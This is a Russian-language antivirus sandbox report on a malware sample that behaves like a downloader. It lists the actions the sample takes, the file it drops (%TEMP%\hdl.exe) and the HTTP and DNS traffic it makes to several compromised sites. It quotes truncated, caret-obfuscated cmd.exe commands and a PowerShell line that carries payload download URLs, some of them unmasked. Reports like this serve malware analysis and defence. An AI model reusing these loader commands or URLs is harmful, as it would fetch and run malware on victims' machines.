Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C"^s^et ^t3=^o&&s^e^t V^toN=^.^o^p&&s^e^t 0^a^lV=()&&^se^t ^H^i^Z=://pr&&^s^e^t ^4^D=r^Y&&set ^Zu^GH= ^ ^ &&^se^t ^sr=t&&^s^et A^2=ms^xm^l&&se^t z^l^h=^ in&&s^e^t ^oC=^h&&^s^e^t ^B^S^0^u=t^t&...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\hdl.exe
Сетевая активность
Подключается к
- 'pr###tzone.com':80
- 'bi####realty.com':80
- '13#.#9.62.179':80
- 'gr##ie.com':80
TCP
Запросы HTTP GET
- http://pr###tzone.com/6MNR5sOsH
- http://bi####realty.com/wp-content/uploads/LCI3Qmm
- http://bi####realty.com/cgi-sys/suspendedpage.cgi
- http://13#.#9.62.179/qP7ffOESV0
- http://gr##ie.com/wp-content/uploads/kKww37Pjid
UDP
- DNS ASK pr###tzone.com
- DNS ASK bi####realty.com
- DNS ASK co##l.nl
- DNS ASK gr##ie.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C"^s^et ^t3=^o&&s^e^t V^toN=^.^o^p&&s^e^t 0^a^lV=()&&^se^t ^H^i^Z=://pr&&^s^e^t ^4^D=r^Y&&set ^Zu^GH= ^ ^ &&^se^t ^sr=t&&^s^et A^2=ms^xm^l&&se^t z^l^h=^ in&&s^e^t ^oC=^h&&^s^e^t ^B^S^0^u=t^t&...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $zvV='OrY';$ClI='http://pr###tzone.com/6MNR5sOsH@http://bihanirealty.com/wp-content/uploads/LCI3Qmm@http://cohol.nl/5tItb3OeS@http://139.59.62.179/qP7ffOESV0@http://gramie.com/wp-content/upload...
